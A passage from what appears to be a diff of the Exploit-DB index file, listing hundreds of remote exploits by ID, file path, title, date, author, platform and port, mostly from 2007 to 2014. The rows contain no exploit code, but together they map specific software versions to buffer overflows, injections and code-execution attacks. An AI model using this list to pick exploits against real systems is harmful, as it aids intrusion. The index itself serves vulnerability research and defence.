Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",remote,windows, +29685,exploits/windows/remote/29685.txt,"Nullsoft SHOUTcast 1.9.7 - Logfile HTML Injection",2007-02-27,SaMuschie,remote,windows, +29686,exploits/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader 7.0.9 - Information Disclosure",2007-02-28,pdp,remote,windows, +29687,exploits/windows/remote/29687.py,"HyperBook Guestbook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure",2007-02-28,PeTrO,remote,windows, +29812,exploits/windows/remote/29812.rb,"DesktopCentral AgentLogUpload - Arbitrary File Upload (Metasploit)",2013-11-25,Metasploit,remote,windows,8020 +29552,exploits/windows/remote/29552.rb,"Symantec Altiris DS - SQL Injection (Metasploit)",2013-11-13,Metasploit,remote,windows,402 +29573,exploits/multiple/remote/29573.xml,"Sage 1.3.6 - Extension Feed HTML Injection",2007-02-09,Fukumori,remote,multiple, +29575,exploits/windows/remote/29575.txt,"Plain Old WebServer 0.0.7/0.0.8 Firefox Extension - Directory Traversal",2006-09-25,"Stefano Di Paola",remote,windows, +29595,exploits/linux/remote/29595.txt,"PHP RRD Browser 0.2 - 'P' Directory Traversal",2007-02-12,"Sebastian Wolfgarten",remote,linux, +29614,exploits/osx/remote/29614.xml,"Parallels - Drag and Drop Hidden Share",2007-02-16,"Rich Mogull",remote,osx, +29619,exploits/windows/remote/29619.html,"Microsoft Internet Explorer 6 - Local File Access",2007-02-20,"Rajesh Sethumadhavan",remote,windows, +29666,exploits/hardware/remote/29666.rb,"Supermicro Onboard IPMI - 'close_window.cgi' Remote Buffer Overflow (Metasploit)",2013-11-18,Metasploit,remote,hardware,80 +29688,exploits/windows/remote/29688.txt,"EmbeddedWB Web Browser ActiveX Control - Remote Code Execution",2007-02-28,shinnai,remote,windows, +29689,exploits/linux/remote/29689.py,"GnuPG 1.x - Signed Message Arbitrary Content Injection",2007-03-05,"Gerardo Richarte",remote,linux, +29690,exploits/linux/remote/29690.py,"KMail 1.x - GnuPG Arbitrary Content Injection",2007-03-05,"Gerardo Richarte",remote,linux, +29691,exploits/linux/remote/29691.py,"Gnome Evolution 2.x - GnuPG Arbitrary Content Injection",2007-03-05,"Gerardo Richarte",remote,linux, +29699,exploits/novell/remote/29699.txt,"Novell Access Management SSLVPN Server - Security Bypass",2007-03-02,anonymous,remote,novell, +29706,exploits/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez_ Eduardo Arriols",remote,linux, +29725,exploits/openbsd/remote/29725.py,"OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow",2007-03-09,"Alfredo Ortega",remote,openbsd, +29732,exploits/php/remote/29732.php,"PHP 5.2 - EXT/Filter Function Remote Buffer Overflow",2007-03-12,"Stefan Esser",remote,php, +29734,exploits/linux/remote/29734.txt,"PineApp MailSecure - Remote Command Execution",2013-11-20,"Ruben Garrote García",remote,linux,7443 +29735,exploits/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow",2007-03-12,LSO,remote,hardware, +29739,exploits/linux/remote/29739.txt,"Apache Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",remote,linux, +29741,exploits/windows/remote/29741.txt,"Microsoft Internet Explorer 7 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",remote,windows, +29749,exploits/multiple/remote/29749.txt,"Oracle Portal 10g - 'P_OldURL' Cross-Site Scripting",2007-03-16,d3nx,remote,multiple, +29752,exploits/php/remote/29752.php,"PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation",2007-03-19,"Stefan Esser",remote,php, +29753,exploits/linux/remote/29753.c,"File(1) 4.13 - Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",remote,linux, +29768,exploits/linux/remote/29768.txt,"Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning",2007-03-21,mark,remote,linux, +29769,exploits/linux/remote/29769.txt,"Opera 9.x - FTP PASV Port-Scanning",2007-03-21,mark,remote,linux, +29770,exploits/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,remote,linux, +29771,exploits/windows/remote/29771.txt,"Microsoft Windows Vista - Windows Mail Local File Execution",2007-03-23,kingcope,remote,windows, +29784,exploits/php/remote/29784.php,"PHP 5.2.1 - Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",remote,php, +29785,exploits/php/remote/29785.txt,"aBitWhizzy - 'whizzypic.php?d' Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,remote,php, +29788,exploits/php/remote/29788.php,"PHP 4.4.4 - 'Zip_Entry_Read()' Integer Overflow",2007-03-27,"Stefan Esser",remote,php, +30117,exploits/php/remote/30117.php,"PHP 5.1.6 - 'Chunk_Split()' Integer Overflow",2007-05-31,"Gerhard Wagner",remote,php, +30130,exploits/php/remote/30130.txt,"PHP 5.2.3 - EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",remote,php, +30142,exploits/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow",2007-06-04,"KaiJern Lau",remote,linux, +30144,exploits/windows/remote/30144.html,"eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow",2007-06-04,shinnai,remote,windows, +30164,exploits/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - 'Tk' Cross-Site Scripting",2007-06-08,"Secunia Research",remote,hardware, +30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows, +30176,exploits/windows/remote/30176.html,"Apple Safari 3 for Windows - Protocol Handler Command Injection",2007-06-12,"Thor Larholm",remote,windows, +30394,exploits/windows/remote/30394.rb,"Adobe Reader ToolButton - Use-After-Free (Metasploit)",2013-12-17,Metasploit,remote,windows, +29807,exploits/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Remote Buffer Overflow",2007-03-31,"Stefan Esser",remote,php, +29808,exploits/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",remote,php, +29814,exploits/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",remote,windows, +29815,exploits/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443 +29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple, +29952,exploits/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,remote,windows, +29840,exploits/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",remote,windows, +29843,exploits/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",remote,windows, +29853,exploits/windows/remote/29853.rb,"LANDesk Management Suite 8.7 Alert Service - 'AOLSRVR.exe' Remote Buffer Overflow",2007-04-13,"Aaron Portnoy",remote,windows, +29857,exploits/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit)",2013-11-27,Metasploit,remote,windows, +29858,exploits/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit)",2013-11-27,Metasploit,remote,windows, +29859,exploits/java/remote/29859.rb,"Apache Roller - OGNL Injection (Metasploit)",2013-11-27,Metasploit,remote,java,8080 +29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple, +29884,exploits/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",remote,multiple, +29897,exploits/windows/remote/29897.txt,"Progress 3.1 - Webspeed _CPYFile.P Unauthorized Access",2007-04-24,suresync,remote,windows, +29930,exploits/multiple/remote/29930.txt,"Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,remote,multiple, +29931,exploits/multiple/remote/29931.txt,"ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access",2007-04-27,anonymous,remote,multiple, +29932,exploits/linux/remote/29932.txt,"RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",remote,linux, +29945,exploits/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",remote,hardware, +29951,exploits/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,remote,windows, +29964,exploits/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow",2007-05-07,MC,remote,windows, +30373,exploits/windows/remote/30373.py,"Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting",2013-12-17,"David Um",remote,windows, +30008,exploits/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)",2013-12-03,Metasploit,remote,java, +30009,exploits/windows/remote/30009.rb,"ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit)",2013-12-03,Metasploit,remote,windows,12221 +30010,exploits/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection (Metasploit)",2013-12-03,Metasploit,remote,php,80 +30011,exploits/windows/remote/30011.rb,"Microsoft - Tagged Image File Format '.TIFF' Integer Overflow (Metasploit)",2013-12-03,Metasploit,remote,windows, +30067,exploits/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal",2007-05-22,"Jesus Roncero",remote,windows, +30069,exploits/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 - 'DartZipLite.dll' ActiveX Control Buffer Overflow",2007-05-22,shinnai,remote,windows, +30074,exploits/linux/remote/30074.txt,"PHP PEAR 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite",2007-05-07,"Gregory Beaver",remote,linux, +30078,exploits/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure",2007-05-23,"Gareth Heyes",remote,multiple, +30089,exploits/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,remote,linux, +30209,exploits/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal (Metasploit)",2013-12-11,Metasploit,remote,windows,8080 +30210,exploits/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)",2013-12-11,Metasploit,remote,multiple,80 +30211,exploits/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution",2013-12-11,rgod,remote,windows, +30212,exploits/php/remote/30212.rb,"vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)",2013-12-11,Metasploit,remote,php,80 +30218,exploits/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 - Parse Error Information Disclosure",2007-06-20,Prili,remote,multiple, +30219,exploits/multiple/remote/30219.txt,"MyServer 0.8.9 - Filename Parse Error Information Disclosure",2007-06-21,"Shay Priel",remote,multiple, +30222,exploits/multiple/remote/30222.txt,"MyServer 0.9.8 - Post.MSCGI Cross-Site Scripting",2007-01-02,Prili,remote,multiple, +30228,exploits/osx/remote/30228.txt,"Apple WebCore - XMLHTTPRequest Cross-Site Scripting",2007-06-22,"Richard Moore",remote,osx, +30229,exploits/multiple/remote/30229.txt,"SHTTPD 1.38 - Filename Parse Error Information Disclosure",2007-06-25,"Shay Priel",remote,multiple, +30231,exploits/multiple/remote/30231.txt,"Key Focus Web Server 3.1 - Index.WKF Cross-Site Scripting",2007-06-25,"Shay Priel",remote,multiple, +30284,exploits/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start '.JNLP' File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",remote,linux, +30254,exploits/hardware/remote/30254.txt,"Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - 'setup.cgi' Cross-Site Scripting",2007-06-27,"Petko Petkov",remote,hardware, +30256,exploits/multiple/remote/30256.txt,"Oracle Rapid Install Web Server - Secondary Login Page Cross-Site Scripting",2007-06-28,"Kaushal Desai",remote,multiple, +30257,exploits/windows/remote/30257.html,"HP Instant Support - ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",remote,windows, +30264,exploits/multiple/remote/30264.txt,"Fujitsu ServerView 4.50.8 - DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",remote,multiple, +30265,exploits/multiple/remote/30265.txt,"SAP Message Server - 'Group' Remote Buffer Overflow",2007-07-05,"Mark Litchfield",remote,multiple, +30278,exploits/windows/remote/30278.c,"SAP DB 7.x Web Server - 'WAHTTP.exe' Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",remote,windows, +30279,exploits/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - 'ADM:GETLOGFILE?PARAMS' Cross-Site Scripting",2007-07-05,"Mark Litchfield",remote,multiple, +30281,exploits/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",remote,windows, +30285,exploits/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox - URI Handler Command Injection",2007-07-10,"Thor Larholm",remote,linux, +30287,exploits/windows/remote/30287.txt,"TippingPoint IPS - Unicode Character Detection Bypass",2007-07-10,Security-Assessment.com,remote,windows, +30288,exploits/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - '.SWF' File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",remote,multiple, +30291,exploits/linux/remote/30291.txt,"ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference",2007-07-11,"Metaeye Security Group",remote,linux, +30292,exploits/multiple/remote/30292.pl,"Apple QuickTime 7.1.5 - Information Disclosure / Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,remote,multiple, +30315,exploits/windows/remote/30315.txt,"Trillian 3.1.6.0 - URI Handler Remote Code Execution",2007-07-16,"Nate Mcfeters",remote,windows, +30319,exploits/linux/remote/30319.c,"tcpdump - Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,remote,linux, +30322,exploits/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",remote,windows, +30381,exploits/windows/remote/30381.txt,"Multiple Browsers - URI Handlers Command Injection",2007-07-25,"Billy Rios",remote,windows, +30469,exploits/linux/remote/30469.rb,"RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)",2013-12-24,Metasploit,remote,linux,443 +31465,exploits/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption",2008-03-21,"Brian Holyfield",remote,windows, +30431,exploits/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - 'BaiduBar.dll' ActiveX Control Remote Code Execution",2007-07-29,cocoruder,remote,windows, +30432,exploits/novell/remote/30432.txt,"Novell Groupwise 6.5 Webaccess - 'User.Id' Cross-Site Scripting",2007-07-30,0x000000,remote,novell, +30439,exploits/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution",2007-07-31,moz_bug_r_a4,remote,linux, +30441,exploits/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Remote Buffer Overflow",2007-07-31,"Code Audit Labs",remote,windows, +30447,exploits/windows/remote/30447.html,"Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access",2007-08-02,anonymous,remote,windows, +30454,exploits/linux/remote/30454.txt,"BlueCat Networks Adonis 5.0.2.8 - TFTP Privilege Escalation",2007-08-06,defaultroute,remote,linux, +30809,exploits/windows/remote/30809.txt,"SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",remote,windows, +30470,exploits/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,remote,unix,5000 +30471,exploits/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,remote,linux,80 +30473,exploits/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,remote,unix,8080 +30485,exploits/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting",2007-08-10,"Henri Lindberg",remote,hardware, +30490,exploits/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",remote,windows, +30491,exploits/multiple/remote/30491.java,"OWASP Stinger - Filter Bypass",2007-08-13,"Meder Kydyraliev",remote,multiple, +30493,exploits/windows/remote/30493.js,"Microsoft XML Core Services 6.0 - SubstringData Integer Overflow",2007-08-14,anonymous,remote,windows, +30495,exploits/multiple/remote/30495.html,"Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",remote,multiple, +30496,exploits/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",remote,multiple, +30499,exploits/multiple/remote/30499.txt,"RndLabs Babo Violent 2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",remote,multiple, +30502,exploits/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Privilege Escalation",2007-08-15,"John Heasman",remote,java, +30507,exploits/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple, +30508,exploits/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple, +30521,exploits/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",remote,multiple, +30523,exploits/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow",2007-08-23,"Luigi Auriemma",remote,multiple, +30532,exploits/windows/remote/30532.pl,"Motorola Timbuktu Pro 8.6.3.1367 - Directory Traversal",2007-08-27,titon,remote,windows, +30535,exploits/linux/remote/30535.pl,"ISC BIND 8 - Remote Cache Poisoning (1)",2007-08-27,"Amit Klein",remote,linux, +30536,exploits/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning (2)",2007-08-27,"Amit Klein",remote,linux, +30537,exploits/windows/remote/30537.txt,"Microsoft MSN Messenger 8.0 - Video Conversation Buffer Overflow",2007-08-28,wushi,remote,windows, +30543,exploits/linux/remote/30543.txt,"Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities",2007-08-29,"Luigi Auriemma",remote,linux, +30971,exploits/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",remote,linux, +30972,exploits/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple, +30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple, +31024,exploits/hardware/remote/31024.txt,"F5 BIG-IP 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,remote,hardware, +30882,exploits/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - 'URL' Cross-Site Scripting",2007-11-10,"Remco Verhoef",remote,hardware, +30883,exploits/windows/remote/30883.js,"BitDefender AntiVirus 2008 - 'bdelev.dll' ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",remote,windows, +30562,exploits/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,anonymous,remote,windows, +30565,exploits/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,remote,windows, +30567,exploits/windows/remote/30567.html,"Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",remote,windows, +30569,exploits/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",remote,windows, +32417,exploits/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,remote,php, +32416,exploits/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,remote,php, +32512,exploits/unix/remote/32512.rb,"FreePBX - 'config.php' Remote Code Execution (Metasploit)",2014-03-25,Metasploit,remote,unix, +32399,exploits/unix/remote/32399.txt,"Multiple Vendor FTP Server - Long Command Handling Security",2008-09-20,"Maksymilian Arciemowicz",remote,unix, +32393,exploits/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution",2008-09-17,"Eli the Bearded",remote,solaris, +32391,exploits/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",remote,hardware, +33141,exploits/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,remote,php,443 +32390,exploits/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",remote,hardware, +32277,exploits/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote Overflow",2014-03-15,sorbo,remote,lin_x86-64, +30582,exploits/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,remote,windows, +30589,exploits/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,remote,windows, +30600,exploits/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,remote,windows, +30622,exploits/windows/remote/30622.html,"Microsoft Internet Explorer 5.0.1 - Arbitrary File Upload",2007-09-27,"Ronald van den Heetkamp",remote,windows, +30627,exploits/windows/remote/30627.pl,"FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",remote,windows, +30630,exploits/multiple/remote/30630.c,"id Software Doom 3 Engine - Console String Visualization Format String",2007-10-02,"Luigi Auriemma",remote,multiple, +30631,exploits/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - 'IE' Cross-Site Scripting",2007-09-20,Websecurity,remote,multiple, +30635,exploits/windows/remote/30635.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",remote,windows, +30636,exploits/windows/remote/30636.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",remote,windows, +30643,exploits/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",remote,multiple, +30645,exploits/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",remote,windows, +30650,exploits/hardware/remote/30650.txt,"Linksys SPA941 - 'SIP From' HTML Injection",2007-10-09,"Radu State",remote,hardware, +30652,exploits/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",remote,hardware, +30673,exploits/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware, +30677,exploits/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection",2007-10-16,"Humberto J. Abdelnur",remote,linux, +30678,exploits/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",remote,multiple, +30692,exploits/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,remote,windows, +30711,exploits/linux/remote/30711.txt,"Shttp 0.0.x - Directory Traversal",2007-10-25,"Pete Foster",remote,linux, +30720,exploits/windows/remote/30720.html,"GlobalLink 2.7.0.8 - ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow",2007-10-29,anonymous,remote,windows, +30728,exploits/linux/remote/30728.txt,"Yarssr 0.2.2 - GUI.PM Remote Code Injection",2007-10-31,"Duncan Gilmore",remote,linux, +30729,exploits/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console - URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",remote,multiple, +30730,exploits/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",remote,windows, +30736,exploits/linux/remote/30736.txt,"GNU Emacs 22.1 - Local Variable Handling Code Execution",2007-11-02,"Drake Wilson",remote,linux, +30740,exploits/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 - Login procedure Authentication Bypass",2007-11-05,"David Smith",remote,hardware, +30742,exploits/multiple/remote/30742.txt,"OpenBase 10.0.x - Remote Buffer Overflow / Remote Command Execution",2007-11-05,"Kevin Finisterre",remote,multiple, +30755,exploits/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN - 'Download_Plugin.php3' Cross-Site Scripting",2007-11-12,"Jan Fry",remote,hardware, +30768,exploits/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,remote,multiple, +30771,exploits/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",remote,multiple, +30772,exploits/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",remote,windows, +30781,exploits/osx/remote/30781.txt,"Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",remote,osx, +31026,exploits/hardware/remote/31026.pl,"Fortinet Fortigate - CRLF Characters URL Filtering Bypass",2008-01-14,Danux,remote,hardware, +30787,exploits/php/remote/30787.rb,"vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)",2014-01-07,Metasploit,remote,php,80 +30816,exploits/windows/remote/30816.py,"Autonomy KeyView Lotus 1-2-3 - File Multiple Buffer Overflow Vulnerabilities",2007-11-26,Sebastian,remote,windows, +30819,exploits/windows/remote/30819.c,"Tencent QQ 2006 LaunchP2PShare - Multiple Stack Buffer Overflow Vulnerabilities",2007-11-27,axis,remote,windows, +30833,exploits/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - 'My.Logon.php3' Cross-Site Scripting",2007-11-30,"Richard Brain",remote,hardware, +30834,exploits/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN - 'Download_Plugin.php3' Cross-Site Scripting",2007-11-10,"Adrian Pastor",remote,hardware, +30835,exploits/unix/remote/30835.sh,"Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting",2007-11-30,"Adrian Pastor",remote,unix, +30838,exploits/multiple/remote/30838.html,"Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filterings",2007-12-01,"Carl Hardwick",remote,multiple, +30850,exploits/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload",2007-12-05,"Luigi Auriemma",remote,multiple, +30897,exploits/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution",2007-12-17,rgod,remote,windows, +30901,exploits/windows/remote/30901.txt,"Apache 2.2.6 (Windows) - Share PHP File Extension Mapping Information Disclosure",2007-12-19,"Maciej Piotr Falkiewicz",remote,windows, +30905,exploits/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x - 'main.swf?baseurl' asfunction: Protocol Handler Cross-Site Scripting",2007-12-18,"Rich Cannings",remote,multiple, +30907,exploits/linux/remote/30907.txt,"Adobe Flash Player 7.0.x/8.0.x/9.0.x - ActiveX Control 'navigateToURL' API Cross Domain Scripting",2007-12-18,"Adam Barth",remote,linux, +30908,exploits/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",remote,windows, +30915,exploits/hardware/remote/30915.rb,"SerComm 